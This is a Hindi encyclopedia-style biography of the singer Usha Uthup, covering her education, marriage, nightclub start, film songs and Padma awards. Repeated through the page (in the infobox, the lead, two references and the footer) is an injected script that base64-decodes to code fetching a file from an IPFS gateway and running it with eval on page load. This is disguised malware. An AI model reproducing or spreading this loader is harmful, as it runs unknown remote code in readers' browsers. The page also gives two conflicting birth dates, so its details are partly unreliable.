ऊषा उत्थुप

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
ऊषा उत्थुप
ऊषा उत्थुप
पूरा नाम ऊषा उत्थुप
अन्य नाम दीदी
जन्म 8 नवम्बर, 1947
जन्म भूमि मुंबई (भूतपूर्व बम्बई), महाराष्ट्र
अभिभावक पिता- वैद्यनाथ सोमेश्वर सामी
पति/पत्नी मिस्टर जानी उत्थुप
कर्म भूमि भारत
कर्म-क्षेत्र गायन
मुख्य फ़िल्में शालीमार, शान, वारदात, अरमान, डिस्को डांसर, प्यारा दुश्मन, अरमान, दौड़, भूत, जॉगर्स पार्क और हैट्रिक।
पुरस्कार-उपाधि पद्म भूषण (2024)

पद्मश्री (2011)]]

प्रसिद्धि भारतीय इंडी-पॉप और पार्श्वगायिका
नागरिकता भारतीय
अन्य जानकारी ऊषा उत्थुप ने अपने फ़िल्मी कॅरियर की शुऱुआत सत्तर के दशक में की। उन्हें हिंदी सिनेमा में सफलता फिल्म 'शालीमार' के गाने 'एक दो तीन च चा' से मिली थी।
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>ऊषा उत्थुप (अंग्रेज़ी: Usha Uthup, जन्म- 8 नवम्बर, 1947) भारतीय इंडी-पॉप और पार्श्वगायिका हैं। वह साठ-सत्तर के दशक की मशहूर पार्श्वगायिका हैं। वह हिंदी सिनेमा में फिल्म 'सात खून माफ़' के गाने 'डार्लिंग' से सुप्रसिद्ध हैं। इस गाने के लिए उन्हें फिल्मफेयर के सर्वश्रेष्ठ गायिका के पुरस्कार से सम्मानित किया गया था। ऊषा उत्थुप को वर्ष 2024 में भारत सरकार ने पद्म भूषण से सम्मानित किया है। इससे पहले साल 2011 में उन्हें पद्म श्री से सम्मानित किया गया था।

परिचय

ऊषा उत्थुप का जन्म 7 नवंबर, 1947 को मुंबई (भूतपूर्व बम्बई), महाराष्ट्र में हुआ था। उनके पिता का नाम वैद्यनाथ सोमेश्वर सामी है। वह तमिलनाडु के चेन्नई से ताल्लुकात रखतें हैं।[1]

शिक्षा

अपनी शुरुआती पढ़ाई ऊषा उत्थुप ने सेंट एग्नेस हाईस्कूल से की। जब वह स्कूल में थीं, तब उन्हें उनकी भरभरी आवाज के लिए संगीत की क्लास से बाहर निकाल दिया गया था। लेकिन उनकी संगीत की अध्यापिका ने उन्हें संगीत की शिक्षा दी। हालांकि उन्होंने कभी संगीत की शिक्षा बाहर से ग्रहण नहीं की, उनका लालन-पालन एक संगीतमय माहौल में हुआ था, जिस कारण उन्हें संगीत की इतनी समझ थी।

विवाह

ऊषा उत्थुप का विवाह मिस्टर जानी उत्थप से हुआ। उनके एक बेटा सनी और बेटी अंजलि है। फ़िलहाल ऊषा उत्थुप कोलकाता की निवासी हैं।

गायन शुरुआत

ऊषा उत्थुप लोगों के लिए एक प्रेरणा हैं। उन्होंने अपने सिंगिंग कॅरियर की शुरुआत होटलों में गाने गाकर की। वह जब 20 साल की थीं, तभी उन्होंने साड़ी में चेन्नई के माउंट रोड स्थित जेम्स नाम के एक छोटे से नाइट क्लब में गाना शुरू किया। उसी समय नाइट क्लब के मालिक ने ऊषा को एक हफ्ते के ट्रायल पीरियड पर रखा था। इसके बाद ऊषा ने मुंबई के 'टॉक ऑफ द टाउन' और कोलकाता के 'ट्रिनकस' क्लब में भी गाना गाया। इसके बाद उन्हें दिल्ली के ओबेरॉय होटल में गाना गाने का मौका मिला।[2] ऊषा उत्थुप को अभिनेता शशि कपूर ने पहला ब्रेक दिया। उनसे ऊषा की मुलाकात दिल्ली के ओबेरॉय होटल में ही हुई थी। वहां शशि कपूर उनकी गायकी से इतने प्रभावित हुए कि फिल्म में गाने का मौका दे दिया।

ऊषा उत्थुप ने 'शालीमार', 'शान, वारदात','अरमान', 'डिस्को डांसर', 'प्यारा दुश्मन', 'अरमान', 'दौड़', 'भूत', 'जॉगर्स पार्क' और 'हैट्रिक' जैसी फिल्मों में गाने गाए, जो खूब पसंद किए गए। वर्ष 1970 में आई 'बॉम्बे टॉकीज' फिल्म में अंग्रेजी में गाना गाया था। 'हरे रामा हरे कृष्णा' फिल्म में ऊषा ने आशा भोसले के साथ 'दम मारो दम' गाना गाया था। जिसके बाद उन्हें कई फिल्मों में गाना गाने का मौका मिला। बेशक कुछ लोग ऊषा उत्थुप की आवाज का मजाक उड़ाते रहे हों, लेकिन उन्होंने अपनी प्रतिभा के दम पर खुद को साबित किया है। ऊषा उत्थुप ने करीब 8 विदेशी और 17 भारतीय भाषाओं में गाने गाए हैं।

कॅरियर

ऊषा उत्थुप ने महज नौ साल की उम्र में अपना स्टेज शो परफॉर्म किया था। उनकी बहन जो कि संगीत की दुनिया से ही खुद को आगे बढ़ा रहीं थीं, उन्होंने उनकी मुलाकात उस दौरान सबसे मशहूर आरजे अमिन सयानी से करायी। उन्होंने ऊषा उत्थुप को रेडियो सिंगिंग शो में गाने का मौका दिया। उन्होंने उस दौरान मॉकिंगबर्ड हिल गाना गाया, जो दर्शकों को बेहद पसंद आया। उसके बाद उनका रेडियो शो में गाने का दौर जारी रहा।[1]

फ़िल्मी सफ़र

ऊषा उत्थुप ने अपने फ़िल्मी कॅरियर की शुऱुआत सत्तर के दशक में की। उन्हें हिंदी सिनेमा में सफलता फिल्म 'शालीमार' के गाने 'एक दो तीन च चा' से मिली थी। उसके बाद उन्होंने हिंदी सिनेमा में कई बेहतरीन गाने गाये। उन्होंने उस दौरान हिंदी सिनेमा के दिग्गज संगीत निर्देशक आर. डी. बर्मन, बप्पी लहरी के साथ काफी हिट गाने गाये। उन्होंने 'दम मारो दम' और 'मेहबूबा' जैसे सुपरहिट गाने हिंदी सिनेमा को दिए, जो अभी भी दर्शकों की जुबान पर कायम हैं।

अपने टीवी कॅरियर की शुरुआत ऊषा उत्थुप ने दूरदर्शन के टीवी शो 'भारत की शान-शाइनिंग स्टार' से की। वह इस शो में बतौर जज नजर आयीं थी। इसके अलावा वह मराठी सिंगिंग रियलिटी शो 'गौरव महाराष्ट्राचा' में भी मुख्य अतिथि के रूप में नजर आ चुकी हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 ऊषा उत्थुप (हिंदी) hindi.filmibeat.com। अभिगमन तिथि: 19 फ़रवरी, 2024।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. ऊषा उत्थुप ने नाइट क्लब से की थी सिंगिंग करियर की शुरुआत (हिंदी) amarujala.com। अभिगमन तिथि: 19 फ़रवरी, 2024।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>